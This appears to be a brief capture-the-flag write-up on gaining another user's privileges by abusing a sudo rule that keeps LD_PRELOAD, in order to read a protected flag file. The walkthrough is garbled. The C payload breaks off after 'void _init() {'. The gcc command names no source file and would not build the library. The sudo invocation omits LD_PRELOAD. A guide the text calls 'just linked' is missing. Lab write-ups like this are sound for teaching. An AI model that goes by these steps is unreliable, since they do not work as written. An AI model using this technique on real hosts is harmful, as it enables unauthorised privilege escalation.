For this challenge, we were given SSH access to a machine, as the user ctf. After running sudo -l, we quickly find that we can run the /opt/Ivazov binary as ctf_cracked. The user in question has a flag.txt file in their home, which only they can read.

We also notice env_keep += LD_PRELOAD. From there, we can try an LD_PRELOAD exploit. The steps taken here are copied from the guide was was just linked.

We save this code in /tmp/pe.c:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {

We compile and run it:

$ cd /tmp
$ # write the code to pe.c
$ gcc -fPIC -shared -o pe.c -nostartfiles
$ sudo -u ctf_cracked /opt/Ivazov
$ # shell as ctf_cracked

And we can now cat /home/ctf_cracked/flag.txt: CYBERTF{LD_PRELOAD_2_Bypass_Ivazov}.

You can read other writeups.